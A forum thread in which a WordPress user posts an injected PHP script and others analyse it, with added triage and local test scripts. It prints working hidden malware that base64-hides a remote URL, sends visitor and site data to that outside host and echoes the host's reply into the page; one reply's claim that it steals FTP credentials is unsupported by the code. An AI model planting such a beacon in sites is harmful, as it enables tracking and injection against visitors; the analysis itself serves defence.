Member Avatar for begueradj

Hello,
I came across this script. I would love to understand what its purpose is (I tried it on localhost and saw its behavior, but I do not understand it):

    <?php
    if (!isset($sRetry))
    {
        global $sRetry;
        $sRetry = 1;
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Seek for the type of the browser that requested the page by checking the header of User_Agent
        $stCurlHandle = NULL;
        $stCurlLink = "";
        // Note: despite the "Bot comes" comment below, this branch runs only when the
        // User-Agent contains NONE of the listed strings, i.e. for visitors who are not
        // known crawlers and not using Chrome, Safari or Opera (Firefox, IE, curl, ...).
        if ((strstr($sUserAgent, 'google') == false)
            && (strstr($sUserAgent, 'yahoo') == false)
            && (strstr($sUserAgent, 'baidu') == false)
            && (strstr($sUserAgent, 'msn') == false)
            && (strstr($sUserAgent, 'opera') == false)
            && (strstr($sUserAgent, 'chrome') == false)
            && (strstr($sUserAgent, 'bing') == false)
            && (strstr($sUserAgent, 'safari') == false)
            && (strstr($sUserAgent, 'bot') == false)) // Bot comes
        {
            if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) { // Create  bot analitics
                // The base64 string only hides the remote URL. The visitor's IP and agent,
                // this site's host name and the requested path are appended as query
                // parameters; nothing is appended to the remote path itself.
                $stCurlLink = base64_decode('aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=')
                    . '?ip=' . urlencode($_SERVER['REMOTE_ADDR'])
                    . '&useragent=' . urlencode($sUserAgent)
                    . '&domainname=' . urlencode($_SERVER['HTTP_HOST'])
                    . '&fullpath=' . urlencode($_SERVER['REQUEST_URI'])
                    . '&check=' . isset($_GET['look']);
                @$stCurlHandle = curl_init($stCurlLink);
            }
        }
        if ($stCurlHandle !== NULL)
        {
            curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
            $sResult = @curl_exec($stCurlHandle);
            // Whatever the remote server answers is written into this page, provided
            // its first byte is "O" (which is blanked before echoing): the remote side
            // decides what, if anything, gets injected into the visitor's page.
            if ($sResult[0] == "O")
            {
                $sResult[0] = " ";
                echo $sResult; // Statistic code end
            }
            curl_close($stCurlHandle);
        }
    }
    ?>

Honestly, I think this script is malware. It was probably injected through a WordPress backdoor. I think the exact name of this malware is "FTP credential malware", distributed or created by pubbotstatistic.com. You will just have to search on this to confirm my assumptions.

If this is truly malware, this is how it operates. This malware will steal the FTP credentials provided on the WordPress script upgrade interface in the administration panel.

Once WordPress connects to the remote site for upgrades, the malware script above will send your FTP credentials to xxxxxxxxxxxxxxxxxxx/statC/stat.php.

Make sure to confirm that this is indeed malware.
To get rid of this malware, make a backup copy of your MySQL database only, and then contact your hosting provider and tell them that your FTP account has been compromised.

Once your hosting provider resets your cPanel and FTP account user and password, it is a lot safer for you to just delete your entire WordPress installation directory and rebuild from the backed-up database.

Another alternative depends on your experience. Connect to your FTP server, open the directory where WordPress is installed, and find any files newer than the rest of the original WordPress files. Normally, malware comes later: if the malware writes anything to your WordPress directory, it will be a lot newer than the original files. Unless you have been editing files lately, in which case your safest option is to just go for the complete deletion.

Once everything is clean, log in to your cPanel, click on the IP blocking option and block this IP address: 108.167.172.14, which is connected to

aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=

and is equivalent to

xxxxxxxxxxxxxxxxxx/statC/stat.php

good luck to you..
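The "newer than the original files" check above, as a script added here (it is not code from the post): it walks a WordPress tree, lists every PHP file modified after a reference file, and flags those containing the fingerprint of the posted script, base64_decode() together with curl_init(). It assumes PHP 7+ on the command line and wp-config.php as the default reference; modification times can be reset by an attacker, so this is a first pass, not proof that a file is clean.

```php
<?php
// triage.php: list PHP files under a WordPress directory that are newer than a
// reference file and flag the fingerprint of the script in this thread
// (base64_decode() together with curl_init()). Added example, not from the post.
// Usage: php triage.php /path/to/wordpress [reference-file]
declare(strict_types=1);

// True when $source carries the injected script's fingerprint: a decoded base64
// string and an outbound cURL call in the same file. Some legitimate plugins use
// both, so a hit means "read this file", not "malicious".
function looksLikeBeacon(string $source): bool
{
    return stripos($source, 'base64_decode(') !== false
        && stripos($source, 'curl_init(') !== false;
}

// Return [path => ['mtime' => int, 'flagged' => bool]] for every .php file under
// $root modified after $since (Unix timestamp), sorted by path.
// Caveat: an attacker can reset mtimes, so treat this as a first pass only.
function findRecentPhp(string $root, int $since): array
{
    $found = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (!$file->isFile() || strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        if ($file->getMTime() <= $since) {
            continue;
        }
        $source = (string) file_get_contents($file->getPathname());
        $found[$file->getPathname()] = [
            'mtime'   => $file->getMTime(),
            'flagged' => looksLikeBeacon($source),
        ];
    }
    ksort($found);
    return $found;
}

$root = $argv[1] ?? '.';
// Default reference: wp-config.php (core updates do not rewrite it); check its mtime first.
$reference = $argv[2] ?? $root . '/wp-config.php';
$since = is_file($reference) ? (int) filemtime($reference) : 0;

foreach (findRecentPhp($root, $since) as $path => $info) {
    printf("%s %-4s %s\n", date('Y-m-d H:i', $info['mtime']), $info['flagged'] ? 'FLAG' : '', $path);
}
```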

Member Avatar for begueradj

Thank you very much for explaining all this to me (indeed I am using WordPress).
However, technically speaking, I do not understand why the script concatenates

    aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=

with the address of my website, and why the result of this concatenation is:

xxxxxxxxxxxxxxxxxxxxxx/statC/stat.php 

instead of

xxxxxxxxxxxxxxxxxxxxxxxx/statC/stat.php.MyOwnWebsite.com

If you want to prove my analysis about this script, try simulating this on your localhost.

change this

 aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=

to this

aHR0cDovL2xvY2FsaG9zdC9zdGF0LnBocA==

which is nothing but redirecting their hack to your localhost/stat.php

In your localhost public directory, create a file stat.php and paste the following code:

    <?php
    // Print what the script sends. $_GET is already URL-decoded by PHP, so no
    // urldecode() is needed; escape before echoing so the agent string cannot
    // inject markup into the test page. Keys match those the script builds.
    if (isset($_GET['ip'])) {
        foreach (['ip', 'useragent', 'domainname', 'fullpath', 'check'] as $key) {
            echo htmlspecialchars($_GET[$key] ?? '', ENT_QUOTES, 'UTF-8') . '<br/>';
        }
    }

You can also write them on a text file....
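A fuller version of that stat.php, added here (it is not code from the original post): it appends each beacon to a log file, so you can see what arrived even though the infected page only echoes the reply when it starts with "O", and it reads the keys exactly as the script builds them, which also answers the concatenation question above: your site's name travels in the "domainname" query parameter and is never appended to the path. It assumes the base64 string was swapped for one decoding to http://localhost/stat.php, that this file sits in the web root, and that the test request comes from a User-Agent containing none of the strings the script checks (Firefox, or curl with a custom agent, works; Chrome, Safari and Opera never trigger the beacon).

```php
<?php
// Local sink for the beacon sent by the injected script. Added example, not from
// the original post. Assumes the script's base64 string was replaced with one that
// decodes to http://localhost/stat.php and that this file is in your web root.
declare(strict_types=1);

// Query keys exactly as the infected script builds them:
// ?ip=...&useragent=...&domainname=...&fullpath=...&check=...
// The infected site's host name arrives in `domainname`; nothing is appended
// to the path, which is why the decoded URL alone never shows your site.
const BEACON_KEYS = ['ip', 'useragent', 'domainname', 'fullpath', 'check'];
const LOG_FILE    = __DIR__ . '/beacon.log';

// When true, the reply starts with "O", the one case in which the infected page
// echoes the remote answer into its own HTML. Useful once, to watch that branch fire.
const SHOW_INJECTION_BRANCH = false;

/**
 * Build one log line from the received query. Absent keys are written as "-";
 * `check` is "1" when the infected page was requested with ?look=, "" otherwise.
 */
function formatBeacon(array $query, string $when): string
{
    $fields = [$when];
    foreach (BEACON_KEYS as $key) {
        $value = isset($query[$key]) && is_scalar($query[$key]) ? (string) $query[$key] : '-';
        // Keep one beacon per line even if the agent string carries control bytes.
        $fields[] = $key . '=' . addcslashes($value, "\0..\37\177\\");
    }
    return implode(' ', $fields) . PHP_EOL;
}

if (!isset($_GET['ip'])) {
    http_response_code(400);
    exit('not a beacon');
}

// $_GET is already URL-decoded by PHP; a second urldecode() would corrupt values
// that legitimately contain '%' or '+'.
file_put_contents(LOG_FILE, formatBeacon($_GET, date('c')), FILE_APPEND | LOCK_EX);

header('Content-Type: text/plain; charset=utf-8');
// A body starting with anything other than "O" is silently discarded by the
// infected page, so the default leaves the test page visually unchanged.
echo SHOW_INJECTION_BRANCH ? 'O<b>[beacon received by stat.php]</b>' : 'logged';
```

Load the infected test page with a matching User-Agent, then read beacon.log next to stat.php rather than looking at the page itself.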

Member Avatar for begueradj

I made the changes you asked for and created the stat.php file, but it does not display anything (and no error).

Why is the result of the concatenation not xxxxxxxxxxxxxxxxxxxxxxxxxx/statC/stat.php.MyOwnWebsite.com but xxxxxxxxxxxxxxxxxxxxxxxxxx/statC/stat.php?

I tried

    <?php
    // Decode the hidden URL on its own (non-strict decoding ignores stray whitespace)
    echo base64_decode('aHR0cDovL3B1YmJvdHN0YXRpc3RpYy5jb20vc3RhdEMvc3RhdC5waHA=');

and you are right that it translates to xxxxxxxxxxxxxxxxxxxxx/statC/stat.php

but your information is being sent out like this: /statC/stat.php?ip=''&useragent=''&domainname=yourWebsite.com&fullpath=''&check=''

You will need to research about this though. What I am telling you above are all based on presumption. It can be true, but there are always other facts outside the scope of my understanding.

Member Avatar for begueradj

Yes, you are right, I am supposed to be able to get the IP parameter as you suggested in your stat.php script, but nothing is received: after all, I think it is logical, as my localhost address is replaced by the name of that website only.
But there is something mysterious I do not understand yet about it.
I checked PHP documentation and I read about all those functions used in the malware, but I did not get an answer.

Thank you very much for highlighting those points to me.
Regards

Member Avatar for diafol

Heh heh, seems like the site xxxxxxxxxxxxxx has a problem - XAMPP is showing - so you have access to their phpinfo(). Interesting.

Member Avatar for begueradj
"Heh heh, seems like the site xxxxxxxxxxxxxxxx has a problem - XAMPP is showing - so you have access to their phpinfo(). Interesting." 

What do you mean, please ?

Diafol... that is your own phpinfo(). I just checked the domain and it is a phishing URL according to Trend Micro.

I think we should remove the full url from this thread.

Member Avatar for diafol

I don't click, thankfully. Thanks for the heads up. Good idea - I'll remove the link now.

Member Avatar for begueradj

Is it a phishing technique as an operation, Veedeoo ?
